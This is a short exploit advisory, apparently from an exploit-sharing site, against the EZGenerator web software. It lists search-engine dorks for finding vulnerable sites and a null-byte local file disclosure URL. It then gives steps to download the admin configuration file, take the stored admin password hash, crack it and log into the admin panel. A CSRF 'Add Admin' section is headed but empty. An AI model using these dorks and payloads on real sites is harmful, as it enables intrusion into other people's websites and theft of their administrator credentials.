EZGenerator – Local File Disclosure/Admin Data/CSRF Vulnerability ================================================================= #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com] .:. Home : http://www.iphobos.com/blog/ .:. Dork : inurl:”utils.php?action= inurl:”centraladmin.php?process=” (gR34‡$ T0 mY L0V3) #################################################################### ===[ Exploit ]=== Local File Disclosure: ===================== www.site.com/utils.php?action=download&filename=file.php%00 Admin Data =========== 1-download centraladmin.php via exploit file discloure [www.site.com/utils.php?action=download&filename=centraladmin.php%00] 2-when download file found it $ca_admin_username=”admin”; $ca_admin_pwd=”c89f9f4ef264e22001f9a9c3d72992ef”; 3-crack hash and join 4-admin panel: www.site.com/centraladmin.php CSRF [Add Admin]: ================ ####################################################################